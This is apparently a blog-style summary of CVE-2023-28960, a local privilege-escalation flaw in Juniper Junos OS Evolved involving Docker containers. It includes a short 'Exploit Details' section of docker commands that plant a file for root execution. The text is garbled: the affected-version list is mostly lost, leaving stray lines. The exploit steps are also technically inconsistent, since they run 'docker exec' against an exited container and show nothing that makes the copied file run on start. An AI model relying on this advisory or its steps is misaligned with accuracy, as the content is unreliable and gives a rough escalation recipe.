CVE-2023-28960: Incorrect Permission Assignment for Critical Resource vulnerability in Juniper Networks Junos OS Evolved

A recently-discovered vulnerability in Juniper Networks Junos OS Evolved, designated as CVE-2023-28960, enables a local, authenticated low-privileged attacker to copy potentially malicious files into an existing Docker container on the local system. Once an administrator inadvertently starts the Docker container, the malicious files will be executed as root, compromising the system's security. Importantly, this vulnerability only impacts systems with Docker configured and enabled; by default, Docker is not enabled. Systems without Docker started are not susceptible to this issue.

21.4 versions prior to 21.4R2-EVO.

Please note that Juniper Networks Junos OS Evolved versions prior to 19.2R1-EVO are not affected by this vulnerability.

Exploit Details

Given that the vulnerability allows a local attacker to copy malicious files into a Docker container, an attacker could leverage this flaw to escalate their privileges by executing arbitrary code as root, potentially gaining full control over the system.

A low-privileged attacker finds an existing Docker container on the system

$ docker ps -a
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
17abcf3b3df8        vulnerable_image    "/bin/bash"         5 hours ago         Exited ()          3 hours ago         vulnerable_container

The attacker copies a malicious file into the container

$ docker cp /tmp/malicious_file.sh vulnerable_container:/root/malicious_file.sh

The attacker ensures that the malicious file is executable

$ docker exec vulnerable_container chmod +x /root/malicious_file.sh

When the administrator inadvertently starts the Docker container, the malicious file is executed

$ docker start vulnerable_container

21.4R2-EVO for 21.4 versions.

Administrators should update their Junos OS Evolved installations to the appropriate fixed releases. These updates are available from Juniper Networks' Support Website.

Original References

For more information on this vulnerability, refer to the Juniper Networks Security Advisory and the CVE-2023-28960 entry in the National Vulnerability Database.

Conclusion

CVE-2023-28960 is a significant vulnerability for systems with Docker configured and enabled in Juniper Networks Junos OS Evolved. Ensuring your installations are updated to the appropriate fixed releases is crucial to maintain secure operations. Stay apprised of updates and recommended practices by following Juniper Networks Security Advisories and the National Vulnerability Database.

Timeline

Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/18/2023 03:15:00 UTC